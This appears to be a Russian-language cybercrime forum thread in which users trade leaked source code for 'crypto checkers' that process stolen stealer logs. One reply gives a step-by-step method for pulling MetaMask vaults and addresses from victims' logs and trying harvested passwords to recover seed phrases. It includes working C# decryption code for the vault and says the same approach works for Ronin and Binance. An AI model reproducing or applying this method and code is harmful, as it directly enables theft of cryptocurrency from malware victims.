• XSS.stack #1 – первый литературный журнал от юзеров форума

Крипто-чекеры

BankAbuser

floppy-диск
Пользователь
Реакции
1
Подскажите, были ли сливы исходов каких-либо крипто чекеров, чтобы поглядеть как они вообще работают?
Либо литературу/темы/статьи по этому вопросу можете скинуть, тоже буду благодарен

На школьном форуме из 4 букв был модер(щас хз есть нет) ник вроде гризли,он по лету сделал кряк на крипточекер,может быть тебе с ним пообщаться стоит

На школьном форуме из 4 букв был модер(щас хз есть нет) ник вроде гризли,он по лету сделал кряк на крипточекер,может быть тебе с ним пообщаться стоит
Будто он их за спасибо даст

Исходники(или их часть) фришного чекера метамаска
+ есть слитые исходники блтулза, там есть крипточекер, можешь посмотреть принцип его работы, что и откуда он берет.

Anyone have the BLTools cracked? This first pastebin what is the code of this? I dont think its python how to compile or run the script. It looks like it checks the metamasks cachedbalance Address against an api and returns the balance which would work.

+ есть слитые исходники блтулза, там есть крипточекер, можешь посмотреть принцип его работы, что и откуда он берет.
зачем ты это скинул)))Он же самый умный,я дал ему контакт кто это и сделал,он посоветовал вникнуть в то что я пишу)Так что зря тратишь время

даст.Я даже канал знаю где лежат исходы чекера и на крипту и на другие сервисы

зачем ты это скинул)))Он же самый умный,я дал ему контакт кто это и сделал,он посоветовал вникнуть в то что я пишу)Так что зря тратишь время
Автор попросил хоть что-то, я предоставил.
Ваши небольшие споры/конфликты высосанные из пальца не особо интересуют. А только создают более конфликтные ситуации в дальнейшем.
Так же что касается следующего сообщения:
Если ты знаешь где лежат исходники разных чекеров в открытом доступе, то предоставь эту информацию, даже игнорируя обиду на автора темы, как не как он не один заинтересован в этом.
Ведь мы пришли сюда за знаниями

всё очень легко (ниже пример по чеку метамаска)
1. Выгребаем все .log от метамаск
2. в них ищем адрес (json элемент selectedAddress). Это будет адрес, проверить балик можно через любой экслорер
3. далее парсим vault (json элемент vault) (нужен что бы достать сидку)
4. Берем все пароли с лога
5. пробуем расшыфровать vault, при помощи паролей которые мы спарсили выше (если пароль от метамаска в логе есть, то vault после расшыфроки станет сидкой =) )
Метод расшыфровки vault:
C#:
 public static string Decrypt(string passworld, string salt, string data, string il)
        {
            try
            {
                MemoryStream heash = new MemoryStream();
                //хеширование
                using (var pbkdf2 = new Rfc2898DeriveBytes(passworld, Convert.FromBase64String(GetUtf8(salt)), 10000, HashAlgorithmName.SHA256))
                {
                    heash.Write(pbkdf2.GetBytes(32), 0, 32);
                }
                //----------------------
                //расшифровка через aes
                byte[] encryptedBytes = Convert.FromBase64String(data);
                GcmBlockCipher cipher = new GcmBlockCipher(new AesFastEngine());
                AeadParameters parameters = new AeadParameters(new KeyParameter(heash.ToArray()), 128, Convert.FromBase64String(il), null);
                cipher.Init(false, parameters);
                byte[] plainBytes = new byte[cipher.GetOutputSize(encryptedBytes.Length)];
                Int32 retLen = cipher.ProcessBytes(encryptedBytes, 0, encryptedBytes.Length, plainBytes, 0);
                cipher.DoFinal(plainBytes, retLen);
                return Encoding.UTF8.GetString(plainBytes).TrimEnd("\r\n\0".ToCharArray());
                //----------------------
            }
            catch {
                  return "";
           }

}

с ронином, бинансом примерно так-же

По поводу сидок, для c# есть библиотеки Nethereum и NBitcoin, их можно использовать для получения адреса (его уже чекать на экспорерах)

P.s. в коде использую Org.BouncyCastle

Последнее редактирование:

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх